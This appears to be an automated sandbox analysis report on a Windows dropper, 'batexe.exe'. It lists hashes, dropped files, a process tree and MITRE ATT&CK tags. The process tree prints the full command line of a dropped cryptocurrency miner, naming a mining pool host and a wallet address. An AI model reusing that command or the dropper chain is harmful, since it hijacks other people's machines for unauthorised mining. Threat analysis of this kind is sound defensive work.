73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
296s
platform
windows10-1703_x64
resource
win10-20231220-ja
resource tags

arch:x64arch:x86image:win10-20231220-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
14/02/2024, 11:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2136	b2e.exe
4584	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4584	cpuminer-sse2.exe
4584	cpuminer-sse2.exe
4584	cpuminer-sse2.exe
4584	cpuminer-sse2.exe
4584	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/220-4-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 220 wrote to memory of 2136	220	batexe.exe	75
PID 220 wrote to memory of 2136	220	batexe.exe	75
PID 220 wrote to memory of 2136	220	batexe.exe	75
PID 2136 wrote to memory of 4724	2136	b2e.exe	77
PID 2136 wrote to memory of 4724	2136	b2e.exe	77
PID 2136 wrote to memory of 4724	2136	b2e.exe	77
PID 4724 wrote to memory of 4584	4724	cmd.exe	79
PID 4724 wrote to memory of 4584	4724	cmd.exe	79

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:220
- C:\Users\Admin\AppData\Local\Temp\9961.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\9961.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9961.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9BF2.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4724
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9961.tmp\b2e.exe

Filesize
1.8MB

MD5
ff327262d6dab722aeb9d7cf0c64cd46

SHA1
eccf7a4afaf177a96ccdeed9b06fb3de3736e287

SHA256
a2307272b825c5c9c5fe9df70ab9d9f37e75ec1d024c3a176961f2151c4a1628

SHA512
846b5cf7d874ae85742a7228338573da89dbb7ba15a4c3fe79ec415bebe20277a611c65716bc2649bfffd36eb0a1bc533b867332e2b0ff668b3a7bf5da51b751

Download Submit
C:\Users\Admin\AppData\Local\Temp\9961.tmp\b2e.exe

Filesize
1.7MB

MD5
777590e37f844c16d7b6d1e8466928d3

SHA1
ec607aa160a7771ea53244fb55f8e279584b866f

SHA256
2c4364599a003ddc0ad9d5d9a91a04de577aea6746f964b2d45b51af179230b3

SHA512
1794aeb5cbd6f8f26d9cb5f6297d9dfc608d879c04129a1d5adedefcefa4c3c22d846bc18910963b10d7ad871723aef79fbbc4432176e30f486bdc76c2e19c24

Download Submit
C:\Users\Admin\AppData\Local\Temp\9BF2.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
208KB

MD5
c7d603496599b1859b4cb34a9ff73b76

SHA1
f04313a32e9c46698ad7199579ebd80c5e6094e4

SHA256
f790092f98fe14cbe65513570fdc05f4763f4b95a75b98755abdd2b98932d618

SHA512
086d82048a242ca17bead1870d2e34627e3859c9d92e2dbcd7c52c150e3bf3838a43cc8739c941534f015b9d71c3a5a3ba3b6c26646bf86aec5e40ae17096df7

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
179KB

MD5
eca183ed72e94df5d0f7d49a1ce2be56

SHA1
53253617b7234d8af3d0bc200d61d388236d5c7b

SHA256
f4932e0fe7d8c94725ec210ff00982526e87acf49bcbab40fb6efd76d1877d20

SHA512
059fab95db71a0982db0bd644a5218617097d437aa5a76f62be3875ad556e0b9998b5bc14a5e91644f012787b007839192caccc490546006d8c661da1d5640aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
149KB

MD5
7635d4f6569224e241d1262eb987a832

SHA1
543e3300747ac247a53c08b8d449c28a57f8448e

SHA256
bb56037a9dc2298712acd04aadbb2988941511a7ae23e53669df707e245fcd45

SHA512
1923c648f4c53fda55bbc30f954ec7eef99e2f963520fd1e286415e02688e6771d7611a4d9a5ad2e02604e94506d54bb5e4d2ebc12c2a144b3ae5ae096bc0b65

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
95KB

MD5
3329d74797725a37084bca829d0d0ad8

SHA1
5fbedfe63896dc1d6e1f6230064ae8bbda04d220

SHA256
79e7d3864d9b81cbaeb2a4d01776c5d9cf517aa8fefac61c502044fca04ecf78

SHA512
237242c716362dab2d5fdc742c1e7a836d5be7d4cbcabbc796a830002c5de7874ed408220bb0e5df421ef68a9d92e540ac74f79664385efe92905f156a72d05b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
183KB

MD5
14f1199fa2e5023a52cc4105b20cd82a

SHA1
795019ae88cae5ba42fc7676d4eafd0a1a54502d

SHA256
b0b9dce90de50dbc5478e382d61a565832a562b8132c66237c07b640157becc6

SHA512
0b4b3ab1165e20179d15171ccb01239ec8dd8564d52c97cfebdbe58aca8b35438229411800602ff264dc308f4d7fa9389a53dacf23d78d2c83da835b1eef8c8b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
27KB

MD5
784788fde139a5bdaa740e98af4caa2e

SHA1
7aea4ee5785b0639062ecf22364ca2bcc1b2218e

SHA256
2ee5da5b05625351344c448985ddcd2ad5de39861f71d7157632960fdbad5a65

SHA512
8e11f77eb97fef5a2a17bcccbf925e0bb4b890d6b48dc810f30bbbe30e194e916bf0047665e76d6c93c9dffb0ae8e4120fba340ea6c13250b344f718b6373ea0

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
138KB

MD5
eb3d2f88d5b9184f85a685ee2af0a65f

SHA1
0939f5a851cede9d7626c0e0b5510c4e84455c1e

SHA256
dacb0c1e1ff2dfc46d714cb1a7338e1bfa8770da08cc99a21a1fb2eecc90680b

SHA512
8692cd29cf64e3f5fd90ffa24c2882bd7afb8938036445acf3843917282d91463e0cfb71f40ca36ed414b7158872516b4a60e57827530ae88be937d3bfaa34c2

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
69KB

MD5
2d5e82a67c8f949c74c7eb716a266da5

SHA1
25ee673c49bc710ee6093bf7751f85aba76510d7

SHA256
1856c5641b20806f8fd2eee08ca6b61548e522dc17ac6e6efc99f267d2181ef8

SHA512
f7375460901123623d6bbdc4cb9bd9f301679444bc4b673b156c436c93a075d3d7df93ee536e5aa0d07a3c96c4b317233bc2bf91fb204e2f7cd1a2af9ff6d054

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
148KB

MD5
c24d908a3ccb2988971fa19a4fc69663

SHA1
f988826d47fa8f92ef5db73f983762e4d2c6ffc0

SHA256
d773f65c87eb490ee795508b72adda526f2a30471fb72a651873e2ada1b60baa

SHA512
f9a749ff24956f1cf85475b380b0c41c670d9816233abd5021860bc525b093002e9b8fc9387d43d6150f74719e6c8ca6ac7b4ecc8aa612083b3c5aa6ea7b01a0

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
103KB

MD5
c1c3decf93185f30cf6530e85cd76233

SHA1
29a3607797fce026e826437ef06e1918c180a66a

SHA256
96dd43e4d42db8e5d09f441d8813c5f71210b78b06b553033da659eccdbfd959

SHA512
b64313ca5fc029d18e400eb74afa34676402551f37414e911431439bae9b9ee629a26df21e47de551a06ee50f2e270c7d35495ef3c0b3fc39f2a22bba0a56c96

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
118KB

MD5
75e453a5c41a6e0e5007cf975a92e1cd

SHA1
3428a0dde2180bcbe31abc9872374f1277b09928

SHA256
faf34af68f1a16bf7d227770d03d32a6d69c5e9d118429612ea66ba1e5fc44d9

SHA512
370938ef144f5ba2ffc4a6da4623843f67d61fb36aaf0802dd16b4a0e19e089cb50fd29376ced85214eb36023a483caae584cdc3c1ef080835622be29403eebe

Download Submit
memory/220-4-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/2136-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2136-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4584-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4584-42-0x0000000059A30000-0x0000000059AC8000-memory.dmp

Filesize
608KB

Download
memory/4584-43-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4584-44-0x0000000000D40000-0x00000000025F5000-memory.dmp

Filesize
24.7MB

Download
memory/4584-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4584-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4584-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4584-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4584-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4584-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4584-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4584-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4584-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download